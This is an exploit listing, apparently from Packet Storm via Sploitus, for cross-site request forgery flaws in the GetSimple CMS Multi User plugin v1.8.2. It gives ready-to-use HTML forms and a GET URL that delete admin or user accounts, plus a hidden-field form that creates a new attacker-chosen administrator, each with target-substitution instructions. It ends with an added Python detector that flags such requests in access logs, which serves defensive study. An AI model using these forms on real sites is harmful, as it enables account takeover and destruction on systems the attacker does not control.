## https://sploitus.com/exploit?id=PACKETSTORM:158863
# Exploit Title: GetSimple CMS Plugin Multi User v1.8.2 - Cross-Site Request Forgery (Delete Admin/User)  
# Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)  
# Date: August 12, 2020  
# Vendor Homepage: http://get-simple.info/extend/plugin/multi-user/133/  
# Software Link: http://get-simple.info/extend/export/960/133/multi-user.zip  
# Version: 1.8.2  
# Tested On: Windows 10 Pro + XAMPP  
# CWE-352: Cross-Site Request Forgery (CSRF)  
# Vulnerability Description:  
# A Cross-Site Request Forgery (CSRF) vulnerability in the Multi User v1.8.2 plugin for GetSimple CMS allows remote attackers to delete admin or user accounts when an authenticated admin visits a third-party site or clicks a URL.  
  
## Usage:   
+ Change <IP||DOMAIN> to target IP address or domain name  
+ Change <ADMIN/USER_NAME> to target username to delete  
  
  
## CSRF GET URL Method  
<IP||DOMAIN>/admin/load.php?id=user-managment&deletefile=<ADMIN/USER_NAME>  
  
## CSRF POST Form Method  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://<IP||DOMAIN>/admin/load.php">  
<input type="hidden" name="id" value="user-managment" />  
<input type="hidden" name="deletefile" value="<ADMIN/USER_NAME>" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
  
  
  
# Exploit Title: GetSimple CMS Plugin Multi User v1.8.2 - Cross-Site Request Forgery (Add Admin)  
# Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)  
# Date: August 12, 2020  
# Vendor Homepage: http://get-simple.info/extend/plugin/multi-user/133/  
# Software Link: http://get-simple.info/extend/export/960/133/multi-user.zip  
# Version: 1.8.2  
# Tested On: Windows 10 Pro + XAMPP  
# CWE-352: Cross-Site Request Forgery (CSRF)  
# Vulnerability Description:  
# A Cross-Site Request Forgery (CSRF) vulnerability in the Multi User v1.8.2 plugin for GetSimple CMS allows remote attackers to add an Admin user when an authenticated admin visits a third-party site.  
  
## Usage:   
+ Change <IP||DOMAIN> to target IP address or domain name  
+ Change <ADMIN> to target username  
+ Change <PASSWORD> to target password  
  
## CSRF POST Form Method  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://<IP||DOMAIN>/admin/load.php?id=user-managment" method="POST">  
<input type="hidden" name="usernamec" value="<ADMIN>" />  
<input type="hidden" name="useremail" value="ADMIN@DOMAIN.LOCAL" />  
<input type="hidden" name="ntimezone" value="" />  
<input type="hidden" name="userlng" value="en_US" />  
<input type="hidden" name="userpassword" value="<PASSWORD>" />  
<input type="hidden" name="usereditor" value="1" />  
<input type="hidden" name="Landing" value="" />  
<input type="hidden" name="add-user" value="Add New User" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>
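
## Detection: user-management requests with a cross-site or missing Referer

For defenders, the two request shapes above (the `deletefile` query and the POST to `load.php?id=user-managment`) can be hunted in web server access logs. This is an added example, not part of the original advisory or the plugin's code; it assumes Apache "combined" log format, and the host name `cms.example.test` and all log lines are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"$'
)

def find_csrf_candidates(lines, site_host):
    """Return (timestamp, client_ip, action, referer) for state-changing
    Multi User requests whose Referer is missing or points off-site."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not a combined-format line
        url = urlsplit(m["target"])
        query = parse_qs(url.query)
        if not url.path.endswith("/admin/load.php") or query.get("id") != ["user-managment"]:
            continue
        if "deletefile" in query:
            action = "delete:" + query["deletefile"][0]
        elif m["method"] == "POST":
            action = "post"  # body is not logged; may be an add-user submission
        else:
            continue  # plain view of the user list, no state change
        ref_host = urlsplit(m["referer"]).hostname  # None for "-" or empty
        if ref_host != site_host.lower():
            hits.append((m["ts"], m["ip"], action, m["referer"]))
    return hits

# Constructed sample log lines (hypothetical hosts and users, not from a real server)
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Aug/2020:10:01:02 +0000] "GET /admin/load.php?id=user-managment HTTP/1.1" 200 5120 "http://cms.example.test/admin/pages.php" "Mozilla/5.0"',
    '192.0.2.10 - - [12/Aug/2020:10:03:40 +0000] "GET /admin/load.php?id=user-managment&deletefile=editor1 HTTP/1.1" 200 5011 "http://cms.example.test/admin/load.php?id=user-managment" "Mozilla/5.0"',
    '192.0.2.10 - - [12/Aug/2020:10:07:15 +0000] "GET /admin/load.php?id=user-managment&deletefile=admin HTTP/1.1" 200 4987 "http://forum.example.net/thread/42" "Mozilla/5.0"',
    '192.0.2.10 - - [12/Aug/2020:10:09:31 +0000] "POST /admin/load.php?id=user-managment HTTP/1.1" 200 5230 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_csrf_candidates(SAMPLE_LOG, "cms.example.test"):
        print(hit)
```

A missing Referer can also come from browser privacy settings, so hits are triage leads to correlate with unexpected account changes, not proof of a forged request.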